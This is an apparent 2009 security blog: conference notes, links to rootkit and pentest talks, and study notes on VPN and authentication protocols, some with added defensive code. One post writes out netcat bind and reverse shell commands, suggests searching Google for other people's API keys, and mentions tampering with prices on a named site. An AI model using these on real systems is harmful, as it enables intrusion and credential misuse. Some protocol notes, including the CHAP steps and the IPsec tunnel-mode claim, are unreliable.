InfoSec Europe 2009

May 4, 2009 | Networking Security

It was a pleasure attending InfoSec Europe 2009, this year as a guest and not having to man a booth.

1) Dan Kaminsky inducted into the Infosec Hall of Fame, and pushing for DNSSEC
2) Whitfield Diffie on the third age of information security (or maybe the end of information security)
3) The e-crime panel was a fiasco.

Rootkits & Web Application Security

May 4, 2009 | Networking Security

Hi All,

I’ve compiled a list of interesting articles and tools you might be interested in checking out. I’ve added some web application testing software as well as dictionary files and pen testing tools.

Web Application Security

Dissecting Web Attacks

http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf

http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Web-Attack-Disection-slides.pdf

New Techniques for Defeating SSL/TLS

https://media.blackhat.com/bh-dc-09/video/Marlinspike/blackhat-dc-09-marlinspike-slide.mov

http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

XSS Anonymous Browser

http://www.blackhat.com/presentations/bh-dc-09/Flick/BlackHat-DC-09-Flick-XAB_Slides.pdf

http://www.blackhat.com/presentations/bh-dc-09/Flick/BlackHat-DC-09-Flick-XAB-wp.pdf

OWASP Linux Distro & Virtual Machine:

http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

OWASP: Running an ISO in VMware

http://securitydistro.com/video-tutorials/53/Running-an-ISO-on-VMware.php

Acunetix WVS

http://www.acunetix.com/

WebScarab

http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

SPIKE Proxy: HTTP Hacking

http://www.immunitysec.com/resources-freesoftware.shtml

Rootkits + Pentesting

http://sectools.org/crackers.html

http://www.offensive-security.com/cons/shmoo2008/muts_at_shmoo.html

Fast-Track

http://www.thepentest.com/

http://www.shmoocon.org/slides/DKENNEDY_FastTrack_ShmooCon_2009.pdf

Wordlists/Dictionary Files:

http://www.outpost9.com/files/WordLists.html

ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://ftp.mirrorgeek.com/openwall/wordlists

Alice in User-Land: Hijacking the Linux Kernel via /dev/mem

http://www.blackhat.com/presentations/bh-europe-09/Lineberry/BlackHat-Europe-2009-Lineberry-code-injection-via-dev-mem-slides.pdf

.NET Framework Rootkits: Backdoors Inside Your Framework

http://www.blackhat.com/presentations/bh-europe-09/Metula/BlackHat-Europe-2009-Metula-NET-Framework-rootkits-whitepaper.pdf

iRK – Crafting OS X Kernel Rootkits

https://www.blackhat.com/presentations/bh-usa-08/D’Auganno/D’Auganno_Extras.zip

https://www.blackhat.com/presentations/bh-usa-08/D’Auganno/BH_US_08_DAuganno_iRK_OS_X_Rootkits.pdf

A New Breed of Rootkit: The System Management Mode (SMM) Rootkit

https://www.blackhat.com/presentations/bh-usa-08/Embleton_Sparks/BH_US_08_Embleton_Sparks_SMM_Rootkits_Slides.pdf

https://media.blackhat.com/bh-usa-08/video/bh-us-08-Embleton/black-hat-usa-08-embleton-smmrootkit-hires.m4v

Nmap: Scanning the Internet

https://www.blackhat.com/presentations/bh-usa-08/Vaskovich/BH_US_08_Vaskovich_Nmap_Scanning_the_Internet.pdf

https://media.blackhat.com/bh-usa-08/video/bh-us-08-Fyodor/black-hat-usa-08-fyodor-nmap.m4v

Meet The Owner Of a Real Hacked Company – Forensic Investigation

https://www.blackhat.com/presentations/bh-usa-08/Shelhart/BH_US_08_Trustwave_Presentation_Shelhart_Meet_Owner.pdf

https://media.blackhat.com/bh-usa-08/video/bh-us-08-Shelhart/black-hat-usa-08-shelhart-hackedcompany-hires.m4v

Dan Kaminsky: Weaponizing Noam Chomsky, or Hacking with Pattern Languages

http://www.shmoocon.org/2007/videos/Weaponizing%20Noam%20Chomsky,%20or%20Hacking%20with%20Pattern%20Languages%20-%20Dan%20Kaminsky.mp4

M14

January 9, 2009 | Networking Security

A few important links and pieces of information.

The free version of netstalker is now in the lab.

WebGoat is a deliberately vulnerable server created and maintained by OWASP; it contains the latest vulnerabilities, which security professionals can try out. The link below contains walkthroughs of these vulnerabilities and challenges:

http://yehg.org/lab/pr0js/training/webgoat.php

The difference between a bind shell and a reverse bind shell:
Ever notice that in the Metasploit Framework there are two types of payloads (bind/normal and reverse)?

You can bind an application to a particular port, for example: nc -lvvp 666 -e cmd.exe
This command binds cmd.exe to port 666; anyone connecting to port 666 will get the command shell’s input and output.

On the other hand, if you are behind a NAT it becomes a problem (and that is where the reverse bind shell comes in).
First let netcat listen on a particular port: nc -lvvp 666
Then connect to that port, but “throw” the command shell to it: nc -v “ip address” 666 -e cmd.exe
As it is an outbound connection, it will go through the NAT.

What happens here is basically what happens during a client-side attack: a hacker sends a reverse shell from the target machine to his listening server. How he does that is another question; he can use trojans, worms or buffer-overflow (BO) exploits. It is essentially a backdoor-type payload. Some reverse shells even use IE (the PassiveX payload), so it is as if you are surfing the web.

Web scanning. Some tools like Wikto can scan your site against the whole Google Hacking Database; for that you need a Google API key. If you are lazy you can find one through Google: simply put “google.license_key” into Google and you can find someone’s API key.

Many sites, such as langalaxy, do not have proper input validation, so tools such as Tamper Data for Firefox or Burp Proxy can be used to manipulate the price (and other) fields in order to change the value on the server.

XSS, or cross-site scripting, is a pain of a vulnerability. Essentially the concept is very simple: if a web server accepts JavaScript or other mobile code, it ends up running scripts at the client. It can be input in a URL or in any field on a site, for example:

http://yehg.org/lab/pr0js/files.php/webgoat_xsslab_stage1.zip

Risk Assessment

January 6, 2009 | Information Security

Risk assessment: “Assess the harm that is likely to result from a significant breach of information security and its potential consequences on significant breaches, and the realistic likelihood of a breach in light of prevailing threats, vulnerabilities and controls.” (ISO 17799 standard)

Information security risk is the combination of a threat and a vulnerability affecting an asset.

An asset can be people, machinery or information, and each asset is given a value.

The risk to those values is raised by either the threat or the vulnerability. An asset is something of value; it can be tangible or intangible, it can be a resource, a process (a way of doing something), a product, a system, or many other things.

A threat is a natural or man-made circumstance: any potential cause of an unwanted incident that causes harm or consequential loss to a system or an organisation. The threat is the cause of an incident, and a vulnerability is a weakness in a safeguard or a control. This is where risk assessment comes into information security.

A vulnerability is the absence or weakness of a safeguard or a control of an asset or a group of assets that may be exploited by a threat.

Scope
The scope has to be agreed beforehand; if it is not, the risk of redundancy and rework is high, and so is the risk that key risks are missed.
The first thing that has to happen in a risk assessment (and this applies to any standard) is to define the scope. Defining the scope is a prerequisite to starting a risk activity or project; setting boundaries is a mandatory part of the process. After the scope, the organisation identifies the assets and gives them a value. A value can be relative to whichever process they want to undertake; the whole point of giving values is that one can scale them. Thus an organisation can prioritise them, start from the top and work its way down.

Having given values to the impact of failure and the likelihood of the threat, the organisation assesses how likely the threat is, which depends on what sort of business the organisation is in and on its industry. It is all very subjective, but threats are assessed by how likely the incident is to occur, and from that an organisation can determine overall risk in terms of priority: how likely is this to happen, then evaluate the controls and ask whether these controls are enough.
Residual risk
At the bottom there will always be residual risk. Therefore it is imperative that information security officers objectively assess which risks are left over, present their findings and have management sign off on them.
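As an added worked example (not part of the original post), the scoring model below puts the notes above into code: every asset gets a value, every threat/vulnerability pair a likelihood and an impact, each control removes a fraction of the inherent risk, and whatever is left is the residual risk that management must sign off. The ordinal scales, the assets and the control effectiveness figures are constructed for illustration; ISO 17799 does not prescribe this arithmetic.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# Ordinal scales used throughout (constructed for this example).
LOW, MEDIUM, HIGH = 1, 2, 3


@dataclass
class Control:
    name: str
    effectiveness: float  # fraction of the remaining risk this control removes, 0..1


@dataclass
class Risk:
    asset: str
    asset_value: int       # 1..3: how much the asset is worth to the organisation
    threat: str
    vulnerability: str
    likelihood: int        # 1..3: how likely the threat is to exploit the weakness
    impact: int            # 1..3: harm if it does
    controls: List[Control] = field(default_factory=list)
    accepted_by: Optional[str] = None   # management sign-off on what is left over

    def inherent(self) -> int:
        """Risk before controls: value x likelihood x impact, scaled 1..27."""
        return self.asset_value * self.likelihood * self.impact

    def residual(self) -> float:
        """Risk after controls; each control removes a fraction of what remains."""
        remaining = float(self.inherent())
        for c in self.controls:
            if not 0.0 <= c.effectiveness <= 1.0:
                raise ValueError(f"{c.name}: effectiveness must be within 0..1")
            remaining *= 1.0 - c.effectiveness
        return round(remaining, 2)


def prioritise(register: List[Risk]) -> List[Risk]:
    """Rank from the top down so the worst residual risk is treated first."""
    return sorted(register, key=lambda r: (r.residual(), r.inherent()), reverse=True)


def unsigned_residual(register: List[Risk], tolerance: float) -> List[Risk]:
    """Residual risks above the tolerance that no manager has signed off on."""
    return [r for r in register if r.residual() > tolerance and r.accepted_by is None]


# Constructed register; scope agreed as "the customer-facing web service".
REGISTER = [
    Risk("customer database", HIGH, "SQL injection", "unvalidated web input", HIGH, HIGH,
         controls=[Control("parameterised queries", 0.8),
                   Control("least-privilege database account", 0.5)]),
    Risk("office laptops", MEDIUM, "theft", "no disk encryption", MEDIUM, HIGH,
         controls=[Control("full-disk encryption", 0.9)], accepted_by="CIO"),
    Risk("payroll process", HIGH, "insider fraud", "single approver", LOW, HIGH),
]

if __name__ == "__main__":
    for r in prioritise(REGISTER):
        print(f"{r.asset:18} inherent={r.inherent():2}  residual={r.residual():4}")
    for r in unsigned_residual(REGISTER, tolerance=4.0):
        print(f"needs management sign-off: {r.asset} ({r.threat})")
```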

SSL/TLS

January 2, 2009 | Networking Security

SSL/TLS is an application-independent layer that works between the application and transport layers of the TCP/IP stack. SSL/TLS can provide:
1) Authentication of the server to the client, via a certificate from a certification authority
2) Negotiation of a common cryptographic algorithm or cipher
3) Authentication of the client to the server
4) Use of asymmetric encryption to transfer shared
5) Establishment of an encrypted connection

HTTPS: Web communications that are secured by SSL/TLS are called HTTPS.

SSH

January 2, 2009 | Networking Security

SSH: Secure Shell is a low-level secure protocol. It is meant to replace telnet, rlogin, rsh and rcp; SSH2 also provides sftp as a replacement for ftp. It encrypts passwords and other data.
SSH consists of:
1) Transport layer protocol (ssh-trans): provides secure authentication, confidentiality and network integrity
2) User authentication protocol (ssh-userauth): authenticates the client-side user to the server; runs over the transport layer protocol.
3) Connection protocol (ssh-conn): multiplexes the encrypted tunnel into several logical channels. It runs over the user authentication protocol.
SSH uses public key encryption as the main method for user authentication, but rhosts/shosts authentication can be used as well.
SSH provides protection from:
1) Packet spoofing
2) IP/host spoofing
3) Password sniffing
4) Eavesdropping

IPSEC

January 2, 2009 | Networking Security

IPsec: with IPsec you can provide privacy, integrity and authenticity for network traffic in the following situations:
1) End-to-end security for IP unicast traffic, using IPsec transport mode
2) Remote-access VPN client and gateway functions, using L2TP secured by IPsec transport mode
3) Site-to-site VPN connections across outsourced private wide area network (WAN) or Internet-based connections, using L2TP/IPsec or IPsec tunnel mode
The three IKE authentication methods of IPsec:
1) Kerberos v5
2) Certificates
3) Passwords
IPsec provides integrity protection, authentication, privacy and replay protection services for IP traffic:
1) IP protocol 50, the Encapsulating Security Payload (ESP) format, which provides confidentiality, authenticity and integrity.
2) IP protocol 51, the Authentication Header (AH) format, which provides integrity and authenticity but not confidentiality.
IPsec has two modes: transport mode (which uses an existing IP packet) and tunnel mode (which places an IP packet inside a new IP packet that is sent to a tunnel endpoint in the IPsec format).
Transport mode was designed to provide end-to-end security, while tunnel mode was designed primarily for network mid-points (routers and gateways); tunnel mode is not suitable for VPN (there is no authentication of the client IP address configuration).
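As an added example (not code from the original post), the snippet below locates the ESP (protocol 50) or AH (protocol 51) header inside constructed IPv4 packets and runs the anti-replay sliding window that both formats keep over their sequence number, which is the replay protection service listed above. The IPv4, AH and ESP layouts follow RFC 791, 4302 and 4303; the 64-entry window, the addresses and the fake ciphertext/ICV bytes are constructed.

```python
import struct
from typing import Dict, List, Optional, Tuple

ESP, AH = 50, 51     # IP protocol numbers named in the text
IP_IN_IP = 4         # AH "next header" value that reveals tunnel mode (IP inside IP)

def parse_ipsec(packet: bytes) -> Optional[Tuple[int, int, int, Optional[bool]]]:
    """Return (protocol, SPI, sequence, tunnel_mode) for an ESP/AH packet, else None.
    Tunnel mode is only knowable for AH: ESP keeps its next-header field inside the
    encrypted trailer, so it is reported as None there."""
    ihl = (packet[0] & 0x0F) * 4
    proto, body = packet[9], packet[ihl:]
    if proto == ESP:                  # SPI(4) | Sequence(4) | ciphertext ...
        spi, seq = struct.unpack("!II", body[:8])
        return ESP, spi, seq, None
    if proto == AH:                   # Next(1) | Len(1) | Rsvd(2) | SPI(4) | Seq(4) | ICV
        nxt, _len, _rsvd, spi, seq = struct.unpack("!BBHII", body[:12])
        return AH, spi, seq, nxt == IP_IN_IP
    return None

class ReplayWindow:
    """Anti-replay sliding window for one security association (one SPI).
    `top` is the highest sequence accepted so far; bit i of `bitmap` records whether
    top - i has been seen.  Older than the window, or already marked, is a replay."""

    def __init__(self, size: int = 64):
        self.size, self.top, self.bitmap = size, 0, 0

    def accept(self, seq: int) -> bool:
        if seq == 0:
            return False                          # sequence 0 is never legal on the wire
        if seq > self.top:                        # new high-water mark: slide the window
            shift = seq - self.top
            self.bitmap = (self.bitmap << shift) if shift < self.size else 0
            self.bitmap = (self.bitmap | 1) & ((1 << self.size) - 1)
            self.top = seq
            return True
        offset = self.top - seq
        if offset >= self.size or self.bitmap & (1 << offset):
            return False                          # fell off the window, or a duplicate
        self.bitmap |= 1 << offset
        return True

def ipv4(proto: int, payload: bytes) -> bytes:
    """Constructed minimal IPv4 header (checksum left zero) in front of the payload."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                       bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])) + payload

def esp(spi: int, seq: int) -> bytes:
    return ipv4(ESP, struct.pack("!II", spi, seq) + b"\xaa" * 16)        # fake ciphertext

def ah(spi: int, seq: int, nxt: int) -> bytes:
    return ipv4(AH, struct.pack("!BBHII", nxt, 4, 0, spi, seq) + b"\xbb" * 12)  # fake ICV

def filter_replays(packets: List[bytes]) -> List[Tuple[int, int, bool]]:
    """Run one window per SPI over a packet stream; yields (spi, seq, accepted)."""
    windows: Dict[int, ReplayWindow] = {}
    verdicts = []
    for p in packets:
        parsed = parse_ipsec(p)
        if parsed is None:
            continue                              # not ESP/AH: outside IPsec's remit
        _proto, spi, seq, _tunnel = parsed
        verdicts.append((spi, seq, windows.setdefault(spi, ReplayWindow()).accept(seq)))
    return verdicts
```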

L2TP

January 2, 2009 | Networking Security

L2TP: L2TP encapsulates PPP frames to be sent over IP, X.25, Frame Relay or ATM. It is an IETF standard and widely implemented (UDP port 1701). It takes advantage of IPsec and encapsulates PPP frames as tunnel data. L2TP was designed for gateway-to-gateway connections or client-to-access-server connections.

PPTP

January 2, 2009 | Networking Security

PPTP: when a PC is connected to the internet, a control connection (tunnel) to the server is established using TCP, working with PPP.
Characteristics of PPTP:
1) It is a layer 2 protocol which encapsulates PPP frames in IP datagrams for transmission over an unsecured public IP network such as the internet (this violates OSI standards).
2) It accomplishes authentication like PPP (PAP, CHAP, MS-CHAP).
3) It requires an IP-based network. Header compression is not supported. PPTP doesn’t support IPsec, and encryption is provided using standard PPP methods.
The data sent is encapsulated in IP datagrams; the encapsulated data can be:
• TCP port 1723
• Another datagram
• An IPX message
• A NetBEUI message

VPN

January 2, 2009 | Networking Security

VPN: a secure connection between a remote computer and a server on a private network that uses the internet as its medium, by having the network permanently connected to the internet and using a modem to dial in to an ISP located nearby. Some ISPs provide international services, so the connection can be made internationally with only a local call. The remote PC and the remote access server establish a secure connection, called tunnelling, which protects the data exchanged between them as it travels over the Internet. Some protocols associated with VPNs:
• Point-to-Point Tunneling Protocol (PPTP): created by the PPTP industry forum, which included Microsoft, 3Com, Ascend and ECI Telematics
• Layer 2 Tunneling Protocol (L2TP): a combination of PPTP and L2F (designed by Cisco)
• Internet Protocol Security (IPsec): an architecture, protocol and related Internet Key Exchange (IKE)

CHAP

January 2, 2009 | Networking Security

Challenge Handshake Authentication Protocol (CHAP) is used when a remote client needs to authenticate itself to a network server, or for two routers to begin a Point-to-Point Protocol (PPP) session.

CHAP
1. Network Access Server (NAS) sends a challenge (session ID, random string of data)

2. Client uses MD5 to return:
a. Username
b. Encrypted challenge
c. Session ID
d. Password
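The CHAP exchange above, as an added runnable simulation (not code from the original post) following RFC 1994: the NAS issues an 8-bit identifier plus a random challenge, the peer answers with MD5(identifier || shared secret || challenge) and its name, and the NAS recomputes the digest from its own copy of the secret. The secret never crosses the wire, and because each challenge is used once, a captured response fails against the next challenge. User names and secrets are constructed.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """Peer side of RFC 1994: Response-Value = MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([identifier & 0xFF]) + secret + challenge).digest()


class NetworkAccessServer:
    """Authenticator side: issues challenges and checks responses against its secrets."""

    def __init__(self, secrets: Dict[str, bytes]):
        self.secrets = secrets          # per-user shared secrets, never sent on the wire
        self.pending = {}               # identifier -> outstanding challenge
        self.identifier = 0

    def challenge(self) -> Tuple[int, bytes]:
        """Step 1: Challenge packet (8-bit identifier, 16 random octets)."""
        self.identifier = (self.identifier + 1) & 0xFF
        chal = os.urandom(16)
        self.pending[self.identifier] = chal
        return self.identifier, chal

    def verify(self, identifier: int, name: str, response: bytes) -> bool:
        """Step 3: Success or Failure, decided by recomputing the expected digest."""
        chal = self.pending.pop(identifier, None)      # each challenge is single-use
        secret = self.secrets.get(name)
        if chal is None or secret is None:
            return False
        expected = chap_response(identifier, secret, chal)
        return hmac.compare_digest(expected, response)  # constant-time comparison


def run_handshake(nas: NetworkAccessServer, name: str, secret: bytes) -> bool:
    """Full three-way exchange: Challenge -> Response -> Success/Failure."""
    identifier, chal = nas.challenge()
    response = chap_response(identifier, secret, chal)   # computed with the peer's secret
    return nas.verify(identifier, name, response)


def replay_is_rejected(nas: NetworkAccessServer, name: str, secret: bytes) -> bool:
    """Why challenge-response beats cleartext: a sniffed response fails against a new challenge."""
    identifier, chal = nas.challenge()
    captured = chap_response(identifier, secret, chal)
    nas.verify(identifier, name, captured)             # legitimate login observed on the wire
    replay_id, _fresh_chal = nas.challenge()
    return not nas.verify(replay_id, name, captured)   # same bytes, different challenge


# Constructed secrets, shared out of band between the NAS and each peer.
SECRETS = {"alice": b"s3cr3t-alice", "bob": b"s3cr3t-bob"}

if __name__ == "__main__":
    nas = NetworkAccessServer(SECRETS)
    print("alice, right secret:", run_handshake(nas, "alice", SECRETS["alice"]))
    print("alice, wrong secret:", run_handshake(nas, "alice", b"guess"))
    print("replay rejected:", replay_is_rejected(nas, "bob", SECRETS["bob"]))
```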

Authentication Mechanisms

January 2, 2009 | Networking Security

PAP = cleartext
SPAP = Shiva PAP; incorporates a reversible encryption mechanism
CHAP = 3-way handshake, MD5
MS-CHAP = MS network domain login; MD4-hashed password, challenge string, session ID
MS-CHAP v2 = larger encryption key size + bidirectional challenge (mutual authentication)

RADIUS

January 2, 2009 | Networking Security

RADIUS provides AAA (Authentication, Authorization and Accounting) services for remote access servers. The separation of a remote access server and a RADIUS (user authentication) server allows:
1) The RADIUS client and server to support different OS and hardware architectures
2) The RADIUS client and server to be geographically separated
3) Securing user accounts by ensuring the accounts are located on servers within the private network and are not directly exposed to the network
4) Encryption of authentication traffic between the RADIUS client and the RADIUS server using IPsec
5) Outsourcing of dial-up remote access to a third-party organisation; the remote access connectivity provided by the RADIUS client allows remote access users to:
1) Use a variety of authentication protocols: CHAP, MS-CHAP or cleartext authentication
2) Use a variety of encryption algorithms, such as Microsoft Point-to-Point Encryption (MPPE) or Data Encryption Standard (DES)
3) Connect with a variety of protocol suites, such as TCP/IP or IPX/SPX
4) Connect with a variety of technologies, such as DSL, ISDN or dial-up
Remote user accounting records the following:
1) Length of time the user is connected
2) Remote user authentication success or failure
3) Situations when the RADIUS server is unable to authenticate a RADIUS client
The purpose of having RADIUS clients and servers is to centralise and secure the authentication of remote users. In order to thwart an attempt to impersonate a RADIUS client, the administrator sets a shared secret during the configuration of RADIUS. Both client and server know it; it is never sent over the network, and the service uses a hashing system to verify the shared secret.
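An added example (not from the original post) of how the shared secret is used without ever being transmitted, following RFC 2865: the RADIUS client hides User-Password with an MD5 keystream derived from the secret and a fresh Request Authenticator, and the server proves it holds the same secret by returning MD5(Code, ID, Length, Request Authenticator, Attributes, Secret) as the Response Authenticator. A client configured with the wrong secret decrypts to garbage and is rejected; a server with the wrong secret fails the client's check. The secret, user and password are constructed.

```python
import hashlib
import hmac
import os
import struct
from typing import Dict

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD = 1, 2

def attr(atype: int, value: bytes) -> bytes:
    """Type-Length-Value attribute; Length covers the 2-byte header too."""
    return struct.pack("!BB", atype, len(value) + 2) + value

def parse_attrs(attrs: bytes) -> Dict[int, bytes]:
    out, i = {}, 0
    while i < len(attrs):
        atype, length = attrs[i], attrs[i + 1]
        out[atype] = attrs[i + 2:i + length]
        i += length
    return out

def hide_password(password: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each with MD5(secret || previous block)."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, block     # chaining uses the *hidden* block, not the plaintext
    return out

def reveal_password(hidden: bytes, secret: bytes, req_auth: bytes) -> bytes:
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")             # strips padding (assumes passwords do not end in NUL)

def packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs

def response_authenticator(code: int, ident: int, req_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    """MD5 over Code, ID, Length, the *request's* Authenticator, Attributes and the secret."""
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(attrs)) + req_auth + attrs + secret).digest()

def client_request(ident: int, user: bytes, password: bytes, secret: bytes) -> bytes:
    req_auth = os.urandom(16)              # fresh per request; makes the keystream unique
    attrs = attr(USER_NAME, user) + attr(USER_PASSWORD, hide_password(password, secret, req_auth))
    return packet(ACCESS_REQUEST, ident, req_auth, attrs)

def server_handle(request: bytes, secret: bytes, users: Dict[bytes, bytes]) -> bytes:
    _code, ident, length = struct.unpack("!BBH", request[:4])
    req_auth, attrs = request[4:20], parse_attrs(request[20:length])
    password = reveal_password(attrs[USER_PASSWORD], secret, req_auth)
    # A client configured with the wrong shared secret decrypts to garbage and is rejected here.
    ok = hmac.compare_digest(users.get(attrs[USER_NAME], b""), password)
    code = ACCESS_ACCEPT if ok else ACCESS_REJECT
    return packet(code, ident, response_authenticator(code, ident, req_auth, b"", secret), b"")

def client_verify(request: bytes, response: bytes, secret: bytes) -> bool:
    """Accept the reply only if it matches our ID and was built with our secret."""
    code, ident, length = struct.unpack("!BBH", response[:4])
    if ident != request[1]:
        return False
    expected = response_authenticator(code, ident, request[4:20], response[20:length], secret)
    return hmac.compare_digest(expected, response[4:20])
```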

TACACS/+

January 2, 2009 | Networking Security

TACACS/TACACS+ provides a way to centrally validate users attempting to gain access to a router or access server. TACACS+ provides a standard method for managing dissimilar network access servers (NAS) from a single set of management services. TACACS+ has three major components:
1) The protocol support within the access servers and routers.
2) The protocol specification.
3) The centralized security database.
TACACS also has AAA (Authentication, Authorization, Accounting). It forwards many types of username/password information (ARA, SLIP, PAP, CHAP, KCHAP).
Authorization has a mechanism which tells an access server which access list a user connected to a port uses.
Accounting: TACACS+ provides accounting information to a database through TCP to ensure a more secure and complete accounting log, audit information and billing information.
Distinctions between RADIUS and TACACS+:
1) RADIUS uses UDP; TACACS+ uses TCP.
2) TACACS+ separates authentication and authorization. RADIUS provides a user profile with authentication that defines all the user-specific parameters.
3) TACACS+ is typically used only for network devices, such as routers and switches; RADIUS is used by PCs and network devices.

DOS/DDOS

January 2, 2009 | Networking Security

DoS/DDoS: these are attacks that consume or disable resources in an attempt to hinder or disrupt some operation or function. There are two types:
1. Flaw exploitation attacks.
2. Flooding attacks, which seek to consume resources.

• Ping of Death: several vendor implementations of the IP stack were not designed to handle oversized packets; when ICMP echo fragments are combined into a packet over 65,536 bytes, most crash or restart.
• Teardrop: a flaw exploitation attack that involves two or more IP fragments that cannot be properly reassembled due to improperly configured fragment offset numbers.
• Land: a flaw exploitation attack where the packet has the same source and destination IP addresses as well as port numbers.
• ICMP Flood: overwhelms a target with ICMP packets until it becomes unresponsive.
• UDP Flood: like an ICMP flood but uses the UDP protocol, sending many UDP packets to random ports on the target. The target responds with either RST or ACK packets; depending on how the system is configured, the target can reboot, crash or become unresponsive.
• Smurf: a type of ICMP flood attack which sends ICMP packets so that all systems on the network echo-reply to a specific target, making it unresponsive or making it crash.
• Fraggle: a variation of the Smurf attack that uses UDP packets.

Protection against DDoS/DoS
• Egress filtering: a filter which drops outgoing packets from the internal subnet that do not have a source address from that subnet.
• Ingress filtering: configures a router to drop external packets with IP source addresses from internal subnets.
• Disable IP-directed broadcasts: defeats Smurf attacks by configuring the router to drop packets which ping the broadcast address of an IP subnet.
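Detection and filtering logic for the flaw-exploitation attacks and router filters listed above, as an added example (not from the original post), run over constructed packet records rather than a live capture; the internal subnet and all addresses are constructed. Each record is a dictionary holding only the IPv4 fields the checks need.

```python
import ipaddress
from typing import Dict, List

INTERNAL = ipaddress.ip_network("192.168.1.0/24")   # constructed: "our" subnet behind the router
IPV4_MAX = 65535                                    # largest legal reassembled IPv4 datagram

# A packet record carries just the IPv4 fields the checks need.  `frag_offset` is in
# 8-byte units as on the wire and `length` is the fragment payload length in bytes.

def is_land(p: Dict) -> bool:
    """Land: source and destination address and port are identical."""
    return (p["proto"] in ("tcp", "udp") and p["src"] == p["dst"]
            and p["sport"] == p["dport"])

def is_ping_of_death(p: Dict) -> bool:
    """Oversized ICMP echo: the fragment would reassemble beyond the IPv4 maximum."""
    return p["proto"] == "icmp" and p.get("frag_offset", 0) * 8 + p["length"] > IPV4_MAX

def is_teardrop(fragments: List[Dict]) -> bool:
    """Teardrop: fragments of one datagram whose byte ranges overlap."""
    spans = sorted((f["frag_offset"] * 8, f["frag_offset"] * 8 + f["length"]) for f in fragments)
    return any(end > next_start for (_, end), (next_start, _) in zip(spans, spans[1:]))

def is_directed_broadcast(p: Dict, net=INTERNAL) -> bool:
    """Smurf amplifier: ICMP echo request (type 8) aimed at the subnet broadcast address."""
    return (p["proto"] == "icmp" and p.get("icmp_type") == 8
            and ipaddress.ip_address(p["dst"]) == net.broadcast_address)

def ingress_allowed(p: Dict, net=INTERNAL) -> bool:
    """Ingress filter (outside interface): an internal source address cannot arrive from outside."""
    return ipaddress.ip_address(p["src"]) not in net

def egress_allowed(p: Dict, net=INTERNAL) -> bool:
    """Egress filter (inside interface): only our own source addresses may leave."""
    return ipaddress.ip_address(p["src"]) in net

def classify(p: Dict) -> List[str]:
    """Tag a packet arriving from outside with every rule it trips."""
    tags = []
    if is_land(p):
        tags.append("land")
    if is_ping_of_death(p):
        tags.append("ping-of-death")
    if is_directed_broadcast(p):
        tags.append("directed-broadcast")
    if not ingress_allowed(p):
        tags.append("spoofed-internal-source")
    return tags

# Constructed traffic as seen on the router's outside interface.
SAMPLES = [
    {"src": "192.168.1.10", "dst": "192.168.1.10", "proto": "tcp", "sport": 139, "dport": 139, "length": 40},
    {"src": "203.0.113.9", "dst": "192.168.1.10", "proto": "icmp", "icmp_type": 8,
     "frag_offset": 8189, "length": 100},
    {"src": "203.0.113.9", "dst": "192.168.1.255", "proto": "icmp", "icmp_type": 8, "length": 64},
    {"src": "198.51.100.4", "dst": "192.168.1.20", "proto": "tcp", "sport": 40000, "dport": 443, "length": 60},
]
TEARDROP_FRAGS = [{"frag_offset": 0, "length": 64}, {"frag_offset": 3, "length": 64}]

if __name__ == "__main__":
    for p in SAMPLES:
        print(p["src"], "->", p["dst"], classify(p) or ["clean"])
    print("teardrop fragments overlap:", is_teardrop(TEARDROP_FRAGS))
```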

Factors of Authentication

January 2, 2009 | Networking Security

1. Something a user knows.
2. Something a user has.
3. Something a user is.

Certificates

January 2, 2009 | Networking Security

Certificates provide the third-party trust in a mutual authentication scheme. A certificate is a block of data containing information used to identify a user.
This information includes:
1. The user's public key
2. Information about the user
3. The dates between which the certificate is valid
4. Information about the issuer of the certificate

Mutual Authentication

January 2, 2009 | Networking Security

Mutual authentication is when the user and the service validate each other. Kerberos allows this (the client is validated to the service, and vice versa). A Certificate Authority, as a trusted third party, could also do that.

Kerberos Authentication

January 2, 2009 | Networking Security

Kerberos authentication: Kerberos is a network authentication protocol that provides strong authentication for client/server applications by using symmetric key cryptography. When a user signs on to the local OS, a local agent (process) sends an authentication request to the Kerberos server. The server responds by sending the encrypted credentials for the user attempting to sign on to the system. The local agent then tries to decrypt the credentials using the user-supplied password. If the correct password has been supplied, the user is validated and given authentication tickets, which allow the user to access other Kerberos-authenticated services. In addition to the tickets, the user is also given a set of cipher keys that can be used to encrypt all data sessions.

1. Realm: the organisational boundary; each realm has an Authentication Server (AS) and a Ticket Granting Server (TGS). Together the AS and TGS form a Key Distribution Centre (KDC). All services and users in the realm receive tickets from the TGS and are authenticated with the AS.
2. Authentication Server: the AS registers all valid users and services. It provides clients with a ticket-granting ticket for the TGS.
3. Ticket Granting Server: to minimise the workload of the AS in a Kerberos realm, the TGS grants the session tickets used by clients to start a session with a service. The clients must use the TGT issued by the AS to request a session ticket from the TGS.
